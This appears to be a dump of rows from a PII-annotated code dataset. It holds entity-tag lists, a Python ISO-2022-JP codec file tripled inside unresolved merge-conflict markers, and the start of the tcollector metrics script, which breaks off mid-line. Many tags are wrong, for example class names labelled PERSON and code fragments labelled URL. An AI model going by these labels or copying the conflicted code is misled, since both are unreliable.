['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 'pytest.mark.fo'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 'control.st'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'aa.four.example.com'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.cl'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'aa.four.example.com'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', 
'127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'pytest.ma'], ['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 'pytest.mark.fo'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 'control.st'], ['URL', 'client1.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'client2.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'client1.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'client1.four.example.com'], ['URL', 'client1.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'client1.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'client2.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'client2.four.example.com'], ['URL', 'client2.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'client2.four.example.com'], ['URL', 'pytest.ma'], ['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 'pytest.mark.fo'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 'control.st'], ['URL', 'client1.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'client2.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'client1.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'client1.four.example.com'], ['URL', 'client1.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'client1.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 
'msg.se'], ['URL', 'client1.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'client2.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'client2.four.example.com'], ['URL', 'client2.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'client2.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'client2.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'client1.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'client1.four.example.com'], ['URL', 'client1.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'client1.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'client1.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'client2.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'pytest.ma'], ['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 'pytest.mark.fo'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 'control.st'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'aa.four.example.com'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'pytest.ma'], ['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 'pytest.mark.re'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 
'control.st'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'pytest.ma'], ['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 'pytest.mark.re'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 'control.st'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'pytest.ma'], ['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 'pytest.mark.re'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 'control.st'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com']]" +13,"<<<<<<< HEAD +<<<<<<< HEAD +# +# iso2022_jp.py: Python Unicode Codec for ISO2022_JP +# +# Written by Hye-Shik Chang 
dummy@email.com +# + +import _codecs_iso2022, codecs +import _multibytecodec as mbc + +codec = _codecs_iso2022.getcodec('iso2022_jp') + +class Codec(codecs.Codec): + encode = codec.encode + decode = codec.decode + +class IncrementalEncoder(mbc.MultibyteIncrementalEncoder, + codecs.IncrementalEncoder): + codec = codec + +class IncrementalDecoder(mbc.MultibyteIncrementalDecoder, + codecs.IncrementalDecoder): + codec = codec + +class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader): + codec = codec + +class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter): + codec = codec + +def getregentry(): + return codecs.CodecInfo( + name='iso2022_jp', + encode=Codec().encode, + decode=Codec().decode, + incrementalencoder=IncrementalEncoder, + incrementaldecoder=IncrementalDecoder, + streamreader=StreamReader, + streamwriter=StreamWriter, + ) +======= +# +# iso2022_jp.py: Python Unicode Codec for ISO2022_JP +# +# Written by Hye-Shik Chang dummy@email.com +# + +import _codecs_iso2022, codecs +import _multibytecodec as mbc + +codec = _codecs_iso2022.getcodec('iso2022_jp') + +class Codec(codecs.Codec): + encode = codec.encode + decode = codec.decode + +class IncrementalEncoder(mbc.MultibyteIncrementalEncoder, + codecs.IncrementalEncoder): + codec = codec + +class IncrementalDecoder(mbc.MultibyteIncrementalDecoder, + codecs.IncrementalDecoder): + codec = codec + +class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader): + codec = codec + +class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter): + codec = codec + +def getregentry(): + return codecs.CodecInfo( + name='iso2022_jp', + encode=Codec().encode, + decode=Codec().decode, + incrementalencoder=IncrementalEncoder, + incrementaldecoder=IncrementalDecoder, + streamreader=StreamReader, + streamwriter=StreamWriter, + ) +>>>>>>> PI:KEY +======= +# +# iso2022_jp.py: Python Unicode Codec for ISO2022_JP +# +# Written by Hye-Shik Chang dummy@email.com +# + +import _codecs_iso2022, codecs +import _multibytecodec as mbc + +codec = _codecs_iso2022.getcodec('iso2022_jp') + +class Codec(codecs.Codec): + encode = codec.encode + decode = codec.decode + +class IncrementalEncoder(mbc.MultibyteIncrementalEncoder, + codecs.IncrementalEncoder): + codec = codec + +class IncrementalDecoder(mbc.MultibyteIncrementalDecoder, + codecs.IncrementalDecoder): + codec = codec + +class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader): + codec = codec + +class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter): + codec = codec + +def getregentry(): + return codecs.CodecInfo( + name='iso2022_jp', + encode=Codec().encode, + decode=Codec().decode, + incrementalencoder=IncrementalEncoder, + incrementaldecoder=IncrementalDecoder, + streamreader=StreamReader, + streamwriter=StreamWriter, + ) +>>>>>>> PI:KEY +",3219,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Hye-Shik Chang'], ['LOCATION', 'multibytecodec'], ['NRP', 'IncrementalEncoder(mbc'], ['PERSON', 'StreamWriter'], ['LOCATION', 'streamwriter'], ['PERSON', 'Hye-Shik Chang'], ['LOCATION', 'multibytecodec'], ['NRP', 'IncrementalEncoder(mbc'], ['PERSON', 'StreamWriter'], ['LOCATION', 'streamwriter'], ['PERSON', 'Hye-Shik Chang'], ['LOCATION', 'multibytecodec'], ['NRP', 'IncrementalEncoder(mbc'], ['PERSON', 'StreamWriter'], ['LOCATION', 'streamwriter'], ['URL', 'jp.py'], ['URL', 'email.com'], ['URL', 'iso2022.ge'], ['URL', 'codecs.Co'], ['URL', 
'codec.de'], ['URL', 'mbc.Mu'], ['URL', 'codecs.In'], ['URL', 'mbc.Mu'], ['URL', 'codecs.In'], ['URL', 'mbc.Mu'], ['URL', 'codecs.St'], ['URL', 'mbc.Mu'], ['URL', 'codecs.St'], ['URL', 'codecs.Co'], ['URL', 'jp.py'], ['URL', 'email.com'], ['URL', 'iso2022.ge'], ['URL', 'codecs.Co'], ['URL', 'codec.de'], ['URL', 'mbc.Mu'], ['URL', 'codecs.In'], ['URL', 'mbc.Mu'], ['URL', 'codecs.In'], ['URL', 'mbc.Mu'], ['URL', 'codecs.St'], ['URL', 'mbc.Mu'], ['URL', 'codecs.St'], ['URL', 'codecs.Co'], ['URL', 'jp.py'], ['URL', 'email.com'], ['URL', 'iso2022.ge'], ['URL', 'codecs.Co'], ['URL', 'codec.de'], ['URL', 'mbc.Mu'], ['URL', 'codecs.In'], ['URL', 'mbc.Mu'], ['URL', 'codecs.In'], ['URL', 'mbc.Mu'], ['URL', 'codecs.St'], ['URL', 'mbc.Mu'], ['URL', 'codecs.St'], ['URL', 'codecs.Co']]" +14,"#!/usr/bin/env python +# This file is part of tcollector. +# Copyright (C) 2010 The tcollector Authors. +# +# This program is free software: you can redistribute it and/or modify it +# under the terms of the GNU Lesser General Public License as published by +# the Free Software Foundation, either version 3 of the License, or (at your +# option) any later version. This program is distributed in the hope that it +# will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty +# of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser +# General Public License for more details. You should have received a copy +# of the GNU Lesser General Public License along with this program. If not, +# see . +# +# tcollector.py +# +""""""Simple manager for collection scripts that run and gather data. + The tcollector gathers the data and sends it to the TSD for storage."""""" +# +# by Mark Smith dummy@email.com. +# + +import atexit +import errno +import fcntl +import logging +import os +import random +import re +import signal +import socket +import subprocess +import sys +import threading +import time +import json +import urllib2 +import base64 +from logging.handlers import RotatingFileHandler +from Queue import Queue +from Queue import Empty +from Queue import Full +from optparse import OptionParser + + +# global variables. +COLLECTORS = {} +GENERATION = 0 +DEFAULT_LOG = '/var/log/tcollector.log' +LOG = logging.getLogger('tcollector') +ALIVE = True +# If the SenderThread catches more than this many consecutive uncaught +# exceptions, something is not right and tcollector will shutdown. +# Hopefully some kind of supervising daemon will then restart it. 
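+# (for example, a daemontools/runit supervise entry or a systemd unit
+# configured with Restart=on-failure)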
+MAX_UNCAUGHT_EXCEPTIONS = 100 +DEFAULT_PORT = 4242 +MAX_REASONABLE_TIMESTAMP = 1600000000 # Good until September 2020 :) +# How long to wait for datapoints before assuming +# a collector is dead and restarting it +ALLOWED_INACTIVITY_TIME = 600 # seconds +MAX_SENDQ_SIZE = 10000 +MAX_READQ_SIZE = 100000 + + +def register_collector(collector): + """"""Register a collector with the COLLECTORS global"""""" + + assert isinstance(collector, Collector), ""collector=%r"" % (collector,) + # store it in the global list and initiate a kill for anybody with the + # same name that happens to still be hanging around + if collector.name in COLLECTORS: + col = COLLECTORS[collector.name] + if col.proc is not None: + LOG.error('%s still has a process (pid=%d) and is being reset,' + ' terminating', col.name, col.proc.pid) + col.shutdown() + + COLLECTORS[collector.name] = collector + + +class ReaderQueue(Queue): + """"""A Queue for the reader thread"""""" + + def nput(self, value): + """"""A nonblocking put, that simply logs and discards the value when the + queue is full, and returns false if we dropped."""""" + try: + self.put(value, False) + except Full: + LOG.error(""DROPPED LINE: %s"", value) + return False + return True + + +class Collector(object): + """"""A Collector is a script that is run that gathers some data + and prints it out in standard TSD format on STDOUT. This + class maintains all of the state information for a given + collector and gives us utility methods for working with + it."""""" + + def __init__(self, colname, interval, filename, mtime=0, lastspawn=0): + """"""Construct a new Collector."""""" + self.name = colname + self.interval = interval + self.filename = filename + self.lastspawn = lastspawn + self.proc = None + self.nextkill = 0 + self.killstate = 0 + self.dead = False + self.mtime = mtime + self.generation = GENERATION + self.buffer = """" + self.datalines = [] + # Maps (metric, tags) to (value, repeated, line, timestamp) where: + # value: Last value seen. + # repeated: boolean, whether the last value was seen more than once. + # line: The last line that was read from that collector. + # timestamp: Time at which we saw the value for the first time. + # This dict is used to keep track of and remove duplicate values. + # Since it might grow unbounded (in case we see many different + # combinations of metrics and tags) someone needs to regularly call + # evict_old_keys() to remove old entries. + self.values = {} + self.lines_sent = 0 + self.lines_received = 0 + self.lines_invalid = 0 + self.last_datapoint = int(time.time()) + + def read(self): + """"""Read bytes from our subprocess and store them in our temporary + line storage buffer. This needs to be non-blocking."""""" + + # we have to use a buffer because sometimes the collectors + # will write out a bunch of data points at one time and we + # get some weird sized chunk. This read call is non-blocking. + + # now read stderr for log messages, we could buffer here but since + # we're just logging the messages, I don't care to + try: + out = self.proc.stderr.read() + if out: + LOG.debug('reading %s got %d bytes on stderr', + self.name, len(out)) + for line in out.splitlines(): + LOG.warning('%s: %s', self.name, line) + except IOError, (err, msg): + if err != errno.EAGAIN: + raise + except: + LOG.exception('uncaught exception in stderr read') + + # we have to use a buffer because sometimes the collectors will write + # out a bunch of data points at one time and we get some weird sized + # chunk. This read call is non-blocking. 
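+        # Worked example (hypothetical datapoints): one non-blocking read
+        # may return 'proc.loadavg.1min 1478020200 0.36 host=' and the
+        # next 'web1\nproc.loadavg.5min 1478020200 0.41 host=web1\n'; the
+        # partial first line just waits in self.buffer until its
+        # terminating newline arrives in a later chunk.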
+ try: + self.buffer += self.proc.stdout.read() + if len(self.buffer): + LOG.debug('reading %s, buffer now %d bytes', + self.name, len(self.buffer)) + except IOError, (err, msg): + if err != errno.EAGAIN: + raise + except AttributeError: + # sometimes the process goes away in another thread and we don't + # have it anymore, so log an error and bail + LOG.exception('caught exception, collector process went away while reading stdout') + except: + LOG.exception('uncaught exception in stdout read') + return + + # iterate for each line we have + while self.buffer: + idx = self.buffer.find('\n') + if idx == -1: + break + + # one full line is now found and we can pull it out of the buffer + line = self.buffer[0:idx].strip() + if line: + self.datalines.append(line) + self.last_datapoint = int(time.time()) + self.buffer = self.buffer[idx+1:] + + def collect(self): + """"""Reads input from the collector and returns the lines up to whomever + is calling us. This is a generator that returns a line as it + becomes available."""""" + + while self.proc is not None: + self.read() + if not len(self.datalines): + return + while len(self.datalines): + yield self.datalines.pop(0) + + def shutdown(self): + """"""Cleanly shut down the collector"""""" + + if not self.proc: + return + try: + if self.proc.poll() is None: + kill(self.proc) + for attempt in range(5): + if self.proc.poll() is not None: + return + LOG.info('Waiting %ds for PID %d (%s) to exit...' + % (5 - attempt, self.proc.pid, self.name)) + time.sleep(1) + kill(self.proc, signal.SIGKILL) + self.proc.wait() + except: + # we really don't want to die as we're trying to exit gracefully + LOG.exception('ignoring uncaught exception while shutting down') + + def evict_old_keys(self, cut_off): + """"""Remove old entries from the cache used to detect duplicate values. + + Args: + cut_off: A UNIX timestamp. Any value that's older than this will be + removed from the cache. + """""" + for key in self.values.keys(): + time = self.values[key][3] + if time < cut_off: + del self.values[key] + + +class StdinCollector(Collector): + """"""A StdinCollector simply reads from STDIN and provides the + data. This collector presents a uniform interface for the + ReaderThread, although unlike a normal collector, read()/collect() + will be blocking."""""" + + def __init__(self): + super(StdinCollector, self).__init__('stdin', 0, '') + + # hack to make this work. nobody else will rely on self.proc + # except as a test in the stdin mode. + self.proc = True + + def read(self): + """"""Read lines from STDIN and store them. We allow this to + be blocking because there should only ever be one + StdinCollector and no normal collectors, so the ReaderThread + is only serving us and we're allowed to block it."""""" + + global ALIVE + line = sys.stdin.readline() + if line: + self.datalines.append(line.rstrip()) + else: + ALIVE = False + + + def shutdown(self): + + pass + + +class ReaderThread(threading.Thread): + """"""The main ReaderThread is responsible for reading from the collectors + and assuring that we always read from the input no matter what. + All data read is put into the self.readerq Queue, which is + consumed by the SenderThread."""""" + + def __init__(self, dedupinterval, evictinterval): + """"""Constructor. + Args: + dedupinterval: If a metric sends the same value over successive + intervals, suppress sending the same value to the TSD until + this many seconds have elapsed. This helps graphs over narrow + time ranges still see timeseries with suppressed datapoints. 
+ evictinterval: In order to implement the behavior above, the + code needs to keep track of the last value seen for each + combination of (metric, tags). Values older than + evictinterval will be removed from the cache to save RAM. + Invariant: evictinterval > dedupinterval + """""" + assert evictinterval > dedupinterval, ""%r <= %r"" % (evictinterval, + dedupinterval) + super(ReaderThread, self).__init__() + + self.readerq = ReaderQueue(MAX_READQ_SIZE) + self.lines_collected = 0 + self.lines_dropped = 0 + self.dedupinterval = dedupinterval + self.evictinterval = evictinterval + + def run(self): + """"""Main loop for this thread. Just reads from collectors, + does our input processing and de-duping, and puts the data + into the queue."""""" + + LOG.debug(""ReaderThread up and running"") + + lastevict_time = 0 + # we loop every second for now. ideally we'll setup some + # select or other thing to wait for input on our children, + # while breaking out every once in a while to setup selects + # on new children. + while ALIVE: + for col in all_living_collectors(): + for line in col.collect(): + self.process_line(col, line) + + if self.dedupinterval != 0: # if 0 we do not use dedup + now = int(time.time()) + if now - lastevict_time > self.evictinterval: + lastevict_time = now + now -= self.evictinterval + for col in all_collectors(): + col.evict_old_keys(now) + + # and here is the loop that we really should get rid of, this + # just prevents us from spinning right now + time.sleep(1) + + def process_line(self, col, line): + """"""Parses the given line and appends the result to the reader queue."""""" + + self.lines_collected += 1 + + col.lines_received += 1 + if len(line) >= 1024: # Limit in net.opentsdb.tsd.PipelineFactory + LOG.warning('%s line too long: %s', col.name, line) + col.lines_invalid += 1 + return + parsed = re.match('^([-_./a-zA-Z0-9]+)\s+' # Metric name. + '(\d+\.?\d+)\s+' # Timestamp. + '(\S+?)' # Value (int or float). + 